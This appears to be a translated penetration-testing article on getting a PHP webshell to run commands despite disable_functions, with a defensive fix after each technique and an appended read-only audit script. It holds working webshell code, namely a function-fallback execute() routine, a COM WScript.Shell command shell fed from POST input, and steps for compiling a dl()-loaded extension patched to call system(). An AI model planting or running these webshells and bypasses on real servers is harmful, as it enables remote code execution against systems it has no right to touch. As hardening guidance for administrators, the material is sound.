0x00 Preface
After uploading a webshell, you may find that it cannot execute commands. In that case we should analyze why, and work out a way to bypass the restriction. The defender, in turn, must use the bypass method to think about a stronger defense.
0x01 How a PHP webshell executes commands
How does a PHP webshell execute system commands? Let's analyze a webshell and find out.
Searching for the relevant keywords locates the following code:
function execute($cfe) {
    $res = '';
    if ($cfe) {
        if (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        } elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        } elseif (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);
        } elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = '';
            while (!@feof($f)) {
                $res .= @fread($f, 1024);
            }
            @pclose($f);
        }
    }
    return $res;
}
In other words, the webshell tries system(), passthru(), shell_exec(), exec() and finally popen() in turn; as soon as one of them exists and runs successfully, the remaining ones are not tried.
0x02 How webshell command execution is disabled
The PHP configuration file (php.ini) has a disable_functions = directive that disables the PHP functions named in it.
Server operators use it to stop PHP from calling command-execution functions, for example:
disable_functions = system,passthru,shell_exec,exec,popen
With this setting, none of these functions can be used to execute system commands.
0x03 Blacklist bypass
Once the principle is understood, many bypass methods come to mind.
The first is a blacklist bypass.
Let's list the functions in PHP that can execute system commands:
assert, system, passthru, exec, pcntl_exec, shell_exec, popen, proc_open, and `` (the backtick operator)
Then check which of them the disable_functions entry in php.ini has missed,
and use that one.
When conducting a penetration test on a large enterprise, assert was not disabled and commands were executed successfully.
A case on WooYun where proc_open had not been disabled:
Http://www.wooyun.org/bugs/wooyun-2013-015991
Solution: keep track of and collect PHP's command-execution functions, and list every one of them in disable_functions.
0x04 System component bypass
This method applies to Windows.
Look at the code:
<?php
$command = $_POST['a'];
$wsh = new COM('WScript.Shell');                // create a COM object
$exec = $wsh->exec('cmd.exe /C ' . $command);   // call the object's method to execute the command
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
Shell.Application achieves the same effect.
The thorough solution is to delete the wshom.ocx file from the System32 directory outright.
0x05 Extension library bypass
On Linux, attackers can bypass the restriction by compiling their own PHP extension library.
The methods found online, and the official instructions, both produced errors,
so after some research a working method for compiling a PHP extension library is given here.
Brace yourself.
First, find out the PHP version running on the server and download a PHP source package of the same or a similar version.
tar zxvf php-5.3.10.tar.gz      # decompress the source
cd php-5.3.10/ext
./ext_skel --extname=dl         # generate an extension skeleton named dl
cd dl
vi config.m4
Find these three lines:
dnl PHP_ARG_WITH(dl, for dl support,
dnl Make sure that the comment is aligned:
dnl [  --with-dl             Include dl support])
Remove the leading dnl from each of them and save.
whereis phpize            # find the phpize path
/usr/local/bin/phpize     # run phpize
vi dl.c
In dl.c, find the line
    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &arg, &arg_len) == FAILURE) {
        return;
    }
and add the following line directly below it:
    system(arg);
Then build and install the extension:
whereis php-config        # find the php-config path
./configure --with-php-config=<path to php-config>
make
make install
[root@TENCENT64 ~/php-5.3.10/ext/dl]# make install
Installing shared extensions:     /usr/local/lib/php/extensions/no-debug-non-zts-20121212/
The shared extension has been generated successfully.
Check the extension_dir setting; here it is
/usr/local/lib/php/extensions/no-debug-non-zts-20121212/
and copy dl.so into that extension_dir directory.
If the extension_dir directory is not writable, write dl.so to any directory you can write to and use ../ in the path passed to dl() to reach it.
Code:
<?php
dl("dl.so"); // dl.so is in the extension_dir directory; if it had to go elsewhere, reach it with ../../
confirm_dl_compiled("$_GET[a] > 1.txt");
?>
The output of the executed command is written to cmd1.txt.
Defense method: add the dl function to disable_functions to disable it.
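As an added example (not part of the original article or of any project it references), the following read-only PHP audit script checks, on the server being hardened, which of the paths discussed in 0x03, 0x04 and 0x05 are still open: which command-execution functions from the list above disable_functions still leaves callable, whether the backtick operator is available (it is implemented through shell_exec, so disabling shell_exec also disables backticks), whether the COM class is present, and whether dl() is usable together with a writable extension_dir. The function list is the article's; the helper names parse_disabled and audit are my own. Run it through the same SAPI as the web application, because the effective values of disable_functions, enable_dl and extension_dir can differ between the CLI and the web SAPI.

```php
<?php
// Added audit helper (not from the original article). It only reads
// configuration and reports; nothing here executes a command.

// Command-execution functions listed in 0x03, plus dl() from 0x05.
$watch = ['system', 'passthru', 'exec', 'shell_exec', 'popen', 'proc_open',
          'pcntl_exec', 'assert', 'dl'];

// disable_functions is a comma-separated list; whitespace around names is tolerated.
function parse_disabled(string $ini): array
{
    $names = array_map('trim', explode(',', $ini));
    return array_values(array_filter($names, 'strlen'));
}

function audit(array $watch): array
{
    $disabled = parse_disabled((string) ini_get('disable_functions'));
    $report = ['still_callable' => [], 'disabled' => [], 'not_compiled' => [], 'notes' => []];

    foreach ($watch as $fn) {
        if (in_array($fn, $disabled, true)) {
            $report['disabled'][] = $fn;
        } elseif (function_exists($fn)) {
            // Not in the blacklist and present in this build: a gap in the blacklist.
            $report['still_callable'][] = $fn;
        } else {
            // Present in neither list, e.g. pcntl_exec on a build without ext/pcntl.
            $report['not_compiled'][] = $fn;
        }
    }

    // The backtick operator calls shell_exec() internally, so it follows that entry.
    if (!in_array('shell_exec', $disabled, true) && function_exists('shell_exec')) {
        $report['notes'][] = 'backtick operator available (shell_exec is not disabled)';
    }

    // 0x04: the COM class only exists when the COM extension is loaded (Windows).
    if (class_exists('COM', false)) {
        $report['notes'][] = 'COM class available: WScript.Shell / Shell.Application are reachable';
    }

    // 0x05: dl() additionally depends on enable_dl and on where dl() can read a .so from.
    if (function_exists('dl') && !in_array('dl', $disabled, true)) {
        $enableDl = filter_var(ini_get('enable_dl'), FILTER_VALIDATE_BOOLEAN);
        $report['notes'][] = 'dl() callable, enable_dl=' . var_export($enableDl, true);
        $dir = (string) ini_get('extension_dir');
        if ($dir !== '' && is_writable($dir)) {
            $report['notes'][] = "extension_dir $dir is writable by the PHP process user";
        }
    }

    return $report;
}

foreach (audit($watch) as $key => $items) {
    printf("%-15s %s\n", $key . ':', $items ? implode(', ', $items) : '(none)');
}
```

Anything listed under still_callable is a blacklist gap of the kind described in 0x03 and belongs in disable_functions; a COM note means the 0x04 component is reachable from PHP, and a dl() note with enable_dl=true or a writable extension_dir means the 0x05 path is open until dl is added to disable_functions.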